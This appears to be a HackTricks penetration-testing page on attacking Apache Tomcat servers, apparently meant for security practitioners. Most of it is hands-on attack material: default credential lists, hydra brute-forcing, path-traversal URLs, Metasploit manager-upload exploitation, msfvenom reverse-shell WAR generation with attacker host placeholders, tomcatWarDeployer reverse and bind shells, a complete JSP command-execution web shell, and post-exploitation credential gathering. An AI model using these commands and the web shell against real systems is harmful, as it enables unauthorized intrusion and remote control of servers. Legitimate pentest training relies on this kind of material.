11 KiB
Tomcat
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Try Hard Security Group
{% embed url="https://discord.gg/tryhardsecurity" %}
Discovery
- It usually runs on port 8080
- Common Tomcat error:
Enumeration
Version Identification
To find the version of Apache Tomcat, a simple command can be executed:
curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat
This will search for the term "Tomcat" in the documentation index page, revealing the version in the title tag of the HTML response.
Manager Files Location
Identifying the exact locations of /manager
and /host-manager
directories is crucial as their names might be altered. A brute-force search is recommended to locate these pages.
Username Enumeration
For Tomcat versions older than 6, it's possible to enumerate usernames through:
msf> use auxiliary/scanner/http/tomcat_enum
Default Credentials
The /manager/html
directory is particularly sensitive as it allows the upload and deployment of WAR files, which can lead to code execution. This directory is protected by basic HTTP authentication, with common credentials being:
- admin:admin
- tomcat:tomcat
- admin:
- admin:s3cr3t
- tomcat:s3cr3t
- admin:tomcat
These credentials can be tested using:
msf> use auxiliary/scanner/http/tomcat_mgr_login
Another notable directory is /manager/status
, which displays the Tomcat and OS version, aiding in vulnerability identification.
Brute Force Attack
To attempt a brute force attack on the manager directory, one can use:
hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html
Along with setting various parameters in Metasploit to target a specific host.
Common Vulnerabilities
Password Backtrace Disclosure
Accessing /auth.jsp
may reveal the password in a backtrace under fortunate circumstances.
Double URL Encoding
The CVE-2007-1860 vulnerability in mod_jk
allows for double URL encoding path traversal, enabling unauthorized access to the management interface via a specially crafted URL.
In order to access to the management web of the Tomcat go to: pathTomcat/%252E%252E/manager/html
/examples
Apache Tomcat versions 4.x to 7.x include example scripts that are susceptible to information disclosure and cross-site scripting (XSS) attacks. These scripts, listed comprehensively, should be checked for unauthorized access and potential exploitation. Find more info here
- /examples/jsp/num/numguess.jsp
- /examples/jsp/dates/date.jsp
- /examples/jsp/snp/snoop.jsp
- /examples/jsp/error/error.html
- /examples/jsp/sessions/carts.html
- /examples/jsp/checkbox/check.html
- /examples/jsp/colors/colors.html
- /examples/jsp/cal/login.html
- /examples/jsp/include/include.jsp
- /examples/jsp/forward/forward.jsp
- /examples/jsp/plugin/plugin.jsp
- /examples/jsp/jsptoserv/jsptoservlet.jsp
- /examples/jsp/simpletag/foo.jsp
- /examples/jsp/mail/sendmail.jsp
- /examples/servlet/HelloWorldExample
- /examples/servlet/RequestInfoExample
- /examples/servlet/RequestHeaderExample
- /examples/servlet/RequestParamExample
- /examples/servlet/CookieExample
- /examples/servlet/JndiServlet
- /examples/servlet/SessionExample
- /tomcat-docs/appdev/sample/web/hello.jsp
Path Traversal Exploit
In some vulnerable configurations of Tomcat you can gain access to protected directories in Tomcat using the path: /..;/
So, for example, you might be able to access the Tomcat manager page by accessing: www.vulnerable.com/lalala/..;/manager/html
Another way to bypass protected paths using this trick is to access http://www.vulnerable.com/;param=value/manager/html
RCE
Finally, if you have access to the Tomcat Web Application Manager, you can upload and deploy a .war file (execute code).
Limitations
You will only be able to deploy a WAR if you have enough privileges (roles: admin, manager and manager-script). Those details can be find under tomcat-users.xml usually defined in /usr/share/tomcat9/etc/tomcat-users.xml
(it vary between versions) (see POST section).
# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed
# deploy under "path" context path
curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/monshell"
# undeploy
curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell"
Metasploit
use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
msf exploit(multi/http/tomcat_mgr_upload) > set rport <port>
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>
msf exploit(multi/http/tomcat_mgr_upload) > exploit
MSFVenom Reverse Shell
- Create the war to deploy:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war
- Upload the
revshell.war
file and access to it (/revshell/
):
Bind and reverse shell with tomcatWarDeployer.py
In some scenarios this doesn't work (for example old versions of sun)
Download
git clone https://github.com/mgeeky/tomcatWarDeployer.git
Reverse shell
./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/
Bind shell
./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/
Using Culsterd
clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows
Manual method - Web shell
Create index.jsp with this content:
<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<pre><%=output %></pre>
mkdir webshell
cp index.jsp webshell
cd webshell
jar -cvf ../webshell.war *
webshell.war is created
# Upload it
You could also install this (allows upload, download and command execution): http://vonloesch.de/filebrowser.html
Manual Method 2
Get a JSP web shell such as this and create a WAR file:
wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp
# When this file is uploaded to the manager GUI, the /backup application will be added to the table.
# Go to: http://tomcat-site.local:8180/backup/cmd.jsp
POST
Name of Tomcat credentials file is tomcat-users.xml
find / -name tomcat-users.xml 2>/dev/null
Other ways to gather Tomcat credentials:
msf> use post/multi/gather/tomcat_gather
msf> use post/windows/gather/enum_tomcat
Other tomcat scanning tools
References
- https://github.com/simran-sankhala/Pentest-Tomcat
- https://hackertarget.com/sample/nexpose-metasploitable-test.pdf
Try Hard Security Group
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.